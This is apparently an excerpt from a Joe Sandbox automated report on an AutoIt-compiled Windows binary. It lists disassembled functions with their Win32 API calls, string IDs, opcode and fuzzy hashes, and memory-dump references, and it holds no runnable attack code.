                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                        • String ID: pMy
                                                                                                                                        • API String ID: 3311320906-3351136658
                                                                                                                                        • Opcode ID: 331a70b678225c843345e537468ba66aa2906881e42d5e1c25e35b5bf56e8767
                                                                                                                                        • Instruction ID: be7d01e249dee380bc2fa869fcf1b66a7b586601ca2cbabed5b6d8e833785617
                                                                                                                                        • Opcode Fuzzy Hash: 331a70b678225c843345e537468ba66aa2906881e42d5e1c25e35b5bf56e8767
                                                                                                                                        • Instruction Fuzzy Hash: 114132B1540B059FD734AF78D895A7A7BE4AF41330F08861DE6AA872D1E37CE8408B20
                                                                                                                                        Function 007CA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007CA668
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007CA67D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: '
                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                        • Opcode ID: eb88dc4ecbdbc59a82030cf7c575b369a83700e10a88ef8620ff639101276aa5
                                                                                                                                        • Instruction ID: d35a707f99240e80018e7e4455fb33ca463e92dae9fd6bbabfa1e748f085b68d
                                                                                                                                        • Opcode Fuzzy Hash: eb88dc4ecbdbc59a82030cf7c575b369a83700e10a88ef8620ff639101276aa5
                                                                                                                                        • Instruction Fuzzy Hash: 3F41F375A00209AFDB14CFA8D980FDA7BB5FB09305F14406EE919AB381D774A952CFA1
                                                                                                                                        Function 007C9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 007C961B
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C9657
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                        • Opcode ID: 7f268fbceda4d1b0d2ac7927b7c5be3a7abf8a000764e34d7da5146892949b15
                                                                                                                                        • Instruction ID: cfef439392f8c4e984f82832dc99c0f4d022b7e95c6410f21a85db3b8b85f366
                                                                                                                                        • Opcode Fuzzy Hash: 7f268fbceda4d1b0d2ac7927b7c5be3a7abf8a000764e34d7da5146892949b15
                                                                                                                                        • Instruction Fuzzy Hash: 6B31AD31500604AEEB109F24DC88FFB77A9FF48360F10851DF9A9D7190CA39AD91CB60
                                                                                                                                        Function 007A5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5BE4
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A5C1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        • Opcode ID: 48229ea1ff5cd0b5e060bc6abe43655b2185b49ab95a41a7d995175219a35270
                                                                                                                                        • Instruction ID: 2b2a3d34b21bdd8cb83224c414d89bd5fbe8e0b394f59bec88ab6eb39a7d7011
                                                                                                                                        • Opcode Fuzzy Hash: 48229ea1ff5cd0b5e060bc6abe43655b2185b49ab95a41a7d995175219a35270
                                                                                                                                        • Instruction Fuzzy Hash: D531FB3160030AEBDB24DF98C889BADBBF5FF87360F180219E981971A4D7789944CF61
                                                                                                                                        Function 007B6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __snwprintf.LIBCMT ref: 007B6BDD
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __snwprintf_memmove
                                                                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                        • API String ID: 3506404897-2584243854
                                                                                                                                        • Opcode ID: af94485e70ffcd50258af7b23410a69ad705d1a83a1ffbabf8529752ddd337dd
                                                                                                                                        • Instruction ID: 86a096641681ef50189d50fac5a70e367bbf18847e6c49d2f292e019893c6fe2
                                                                                                                                        • Opcode Fuzzy Hash: af94485e70ffcd50258af7b23410a69ad705d1a83a1ffbabf8529752ddd337dd
                                                                                                                                        • Instruction Fuzzy Hash: A8214C31600218EACF15EFA4C886AEE7BA9FF49700F004455F956E7241DA7CAA41CBA1
                                                                                                                                        Function 007C91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C9269
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C9274
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: Combobox
                                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                                        • Opcode ID: 77bdcf3bb3db7bca393b8a21d0d08cb0d6dee9e8db9802107d0d57c06a2c891f
                                                                                                                                        • Instruction ID: 9262f5a2cbb9b30e5c1262d1dddba2293d4433fe868abbb59ada9fa1445f88bd
                                                                                                                                        • Opcode Fuzzy Hash: 77bdcf3bb3db7bca393b8a21d0d08cb0d6dee9e8db9802107d0d57c06a2c891f
                                                                                                                                        • Instruction Fuzzy Hash: 1A119371200208BFEF618E54DC85FEB776AFB883A4F10412CFA5897290D639DC5187A0
                                                                                                                                        Function 007C970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077C657
                                                                                                                                          • Part of subcall function 0077C619: GetStockObject.GDI32(00000011), ref: 0077C66B
                                                                                                                                          • Part of subcall function 0077C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077C675
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 007C9775
                                                                                                                                        • GetSysColor.USER32(00000012), ref: 007C978F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                        • Opcode ID: b60e13ebe66bd2179a0538383331ed2f27b3990fbada4ddb403c2f45c8fcc83d
                                                                                                                                        • Instruction ID: 65a2221c6e08e05927c8761edd13c47ebe4a38b1d48ff17cb520c7d7e94cae99
                                                                                                                                        • Opcode Fuzzy Hash: b60e13ebe66bd2179a0538383331ed2f27b3990fbada4ddb403c2f45c8fcc83d
                                                                                                                                        • Instruction Fuzzy Hash: 95112672520209AFDF04DFB8C889EEA7BA8FB08354F00552DFA56E3240E639E851DB50
                                                                                                                                        Function 007C9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 007C94A6
                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007C94B5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                        • Opcode ID: c6497c41b04b7a6dbf65377f453951c8669653edd0072c07db0d6dbe1048346a
                                                                                                                                        • Instruction ID: 92325e8f168203fba0cda8bd634182ba6f71ed1777f65838e7e77edea571a9ba
                                                                                                                                        • Opcode Fuzzy Hash: c6497c41b04b7a6dbf65377f453951c8669653edd0072c07db0d6dbe1048346a
                                                                                                                                        • Instruction Fuzzy Hash: 49115B71100148AFEB548EA49C88FAB376AEB05374F20872CFA65971D0C679DC529B60
                                                                                                                                        Function 007A5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5CF3
                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007A5D12
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        • Opcode ID: d87b6908f1955f36dcca6e7a7cefae3337fa758a445b51dc674c3291743a3f9a
                                                                                                                                        • Instruction ID: 60e17fcae63beae716e4c314379c4e9bf3073d9da6b2a33f2a9f2d0e0ae76b4e
                                                                                                                                        • Opcode Fuzzy Hash: d87b6908f1955f36dcca6e7a7cefae3337fa758a445b51dc674c3291743a3f9a
                                                                                                                                        • Instruction Fuzzy Hash: 8B11E672E01629ABDF20DB58DC88B9D7BF9AB87350F280221ED41EB190D774AD05C7A0
                                                                                                                                        Function 007B53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007B544C
                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007B5475
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                        • String ID: <local>
                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                        • Opcode ID: 20546c7ea6ee0eef51ad8cae0daa3b19a7de7200488f8c31c7479f93e29a75cd
                                                                                                                                        • Instruction ID: 82d30ba30d1aaebf94805d274c58e31c75cfbe5b523466a14db62318706e027c
                                                                                                                                        • Opcode Fuzzy Hash: 20546c7ea6ee0eef51ad8cae0daa3b19a7de7200488f8c31c7479f93e29a75cd
                                                                                                                                        • Instruction Fuzzy Hash: 3F11C270141AA1BADB258F518C85FFBFFA8FF16752F10822AF65596040E7B869C0C6F0
                                                                                                                                        Function 007BACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: htonsinet_addr
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 3832099526-2422070025
                                                                                                                                        • Opcode ID: 9253a83d76ca465a1845af4155bba5dead2d27e7ee6037cafc03a63150dcb733
                                                                                                                                        • Instruction ID: c18aa0b0495eac0afcb751c73f346cff13184386601df0ff3667ca0715e1eea3
                                                                                                                                        • Opcode Fuzzy Hash: 9253a83d76ca465a1845af4155bba5dead2d27e7ee6037cafc03a63150dcb733
                                                                                                                                        • Instruction Fuzzy Hash: 5A01D235200305BBCB20AFA4C886FEDB364FF49720F10851AF9169B6D1DA79E804C755
                                                                                                                                        Function 0079C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0079C5E5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                                        • Opcode ID: 0931ced6f86fa48e32061c87bb6c77ca69109ea25345e7f4ba8d33a2da4cae38
                                                                                                                                        • Instruction ID: 4283811717baad0e9953744f9850aacc502e2424c52d5363ad11c1b5795224e4
                                                                                                                                        • Opcode Fuzzy Hash: 0931ced6f86fa48e32061c87bb6c77ca69109ea25345e7f4ba8d33a2da4cae38
                                                                                                                                        • Instruction Fuzzy Hash: E201B171641128ABCF09EBA4DC56DFE7369AF46310B280A19F873E72D1DA3869189750
                                                                                                                                        Function 007AC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                        • Opcode ID: 7c9743f795e732d665dd493fc750c10baf8ffea0c2a33c1f2a518c685db73c6f
                                                                                                                                        • Instruction ID: 104176ed1568ca7ba74672202c6e3d43f74ec04c17b551083daf8a215e0baeff
                                                                                                                                        • Opcode Fuzzy Hash: 7c9743f795e732d665dd493fc750c10baf8ffea0c2a33c1f2a518c685db73c6f
                                                                                                                                        • Instruction Fuzzy Hash: FB01F572940258BEDB28D7A8C81AEFE7BF89B06711F00415AF197D2181E4B8A7088B60
                                                                                                                                        Function 0079C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0079C4E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 1456604079-1403004172
